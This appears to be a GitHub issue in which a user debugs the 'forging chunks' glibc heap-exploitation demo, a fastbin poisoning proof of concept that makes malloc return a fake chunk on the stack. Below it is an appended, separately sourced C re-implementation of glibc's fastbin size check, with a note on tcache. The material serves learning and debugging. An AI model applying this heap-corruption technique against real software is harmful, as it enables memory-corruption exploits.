
forging chunk issues #12

Open
@tregua87

Description

Hi! I am trying "forging chunks" on an x64 machine, Ubuntu 18.04.2 LTS.

This is the code I am executing, plus some printf calls for debugging.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {

  struct forged_chunk {
    size_t prev_size;
    size_t size;
    struct forged_chunk *fd;
    struct forged_chunk *bck;
    char buf[10];               // padding
  };

  // First grab a fast chunk
  char *a = malloc(10);               // 'a' points to 0x219c010

  printf("a: %p\n", a);

  // Create a forged chunk
  struct forged_chunk chunk;    // At address 0x7ffc6de96690
  printf("chunk: %p\n", &chunk);
  chunk.size = 0x20;            // This size should fall in the same fastbin
  char* data = (char *)&chunk.fd;     // Data starts here for an allocated chunk
  strcpy(data, "attacker's data");
  printf("data %p\n", data);

  // Put the fast chunk back into fastbin
  free(a);
  // Modify 'fd' pointer of 'a' to point to our forged chunk
  *((unsigned long long *)a) = (unsigned long long)&chunk;
  // Remove 'a' from HEAD of fastbin
  // Our forged chunk will now be at the HEAD of fastbin
  char* aa = malloc(10);                   // Will return 0x219c010
  printf("aa: %p\n", aa);

  char* victim = malloc(10);          // Points to 0x7ffc6de966a0
  // Print the pointer value itself: "&victim" would print the address of the
  // local variable on the stack, not the chunk malloc returned
  printf("victim: %p\n", victim);
  printf("%s\n", victim);       // Prints "attacker's data" !!

  return 0;
}

While this is the output:

a: 0x5646ebdb2260
chunk: 0x7ffff376dff0
data 0x7ffff376e000
aa: 0x5646ebdb2260
victim: 0x7ffff376dfd0
�

But the victim address is not aligned as expected.

Do you have any idea?
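As an added example (not code from the issue or from the heap-exploitation project), the following re-implements the size check that glibc's malloc applies when it takes a chunk from a fastbin, which is why the forged chunk above must carry size 0x20 to be handed out for a malloc(10). It assumes a 64-bit glibc layout (SIZE_SZ = 8); the macro names mirror glibc's, and forged_size_passes_fastbin_check is a name chosen here.

```c
#include <stdio.h>
#include <stddef.h>

#define SIZE_SZ           sizeof(size_t)
#define MALLOC_ALIGNMENT  (2 * SIZE_SZ)
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
#define MIN_CHUNK_SIZE    (4 * SIZE_SZ)
#define MINSIZE           ((MIN_CHUNK_SIZE + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
#define SIZE_BITS         7                    /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
#define DEFAULT_MXFAST    (64 * SIZE_SZ / 4)   /* 128 on 64-bit */
/* glibc's global_max_fast after set_max_fast(DEFAULT_MXFAST): 0x80 on 64-bit */
#define GLOBAL_MAX_FAST   ((DEFAULT_MXFAST + SIZE_SZ) & ~MALLOC_ALIGN_MASK)

/* glibc request2size(): bytes requested by the user -> chunk size including header */
size_t request2size(size_t req) {
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)
               ? MINSIZE
               : (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK;
}

/* glibc fastbin_index(): which fastbin a chunk size lands in (64-bit: >> 4, then - 2).
 * The unsigned wrap for sizes below 0x20 is intentional, as in glibc. */
unsigned fastbin_index(size_t sz) {
    return (unsigned)(sz >> (SIZE_SZ == 8 ? 4 : 3)) - 2;
}

/* Returns 1 if the fastbin path of malloc(req) would hand out a chunk whose
 * size field is forged_size, 0 if glibc would instead abort with
 * "malloc(): memory corruption (fast)" (or never use a fastbin for req). */
int forged_size_passes_fastbin_check(size_t req, size_t forged_size) {
    size_t nb = request2size(req);
    if (nb > GLOBAL_MAX_FAST)                 /* request too large for fastbins */
        return 0;
    unsigned idx = fastbin_index(nb);         /* bin malloc looks in */
    size_t victim_size = forged_size & ~(size_t)SIZE_BITS;   /* chunksize(): strip flag bits */
    return fastbin_index(victim_size) == idx; /* the check glibc performs on the victim */
}

int main(void) {
    /* constructed candidate size fields for the forged chunk, request of 10 bytes */
    size_t sizes[] = { 0x20, 0x21, 0x2f, 0x30, 0x10, 0x40 };
    for (size_t i = 0; i < sizeof sizes / sizeof *sizes; i++)
        printf("malloc(10) with forged size 0x%zx: %s\n", sizes[i],
               forged_size_passes_fastbin_check(10, sizes[i]) ? "accepted" : "rejected");
    return 0;
}
```

On Ubuntu 18.04 (glibc 2.27) a malloc(10) is served from tcache first, and tcache_get applies no size check at all, so this fastbin check is only reached once the tcache bin for that size already holds 7 entries.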
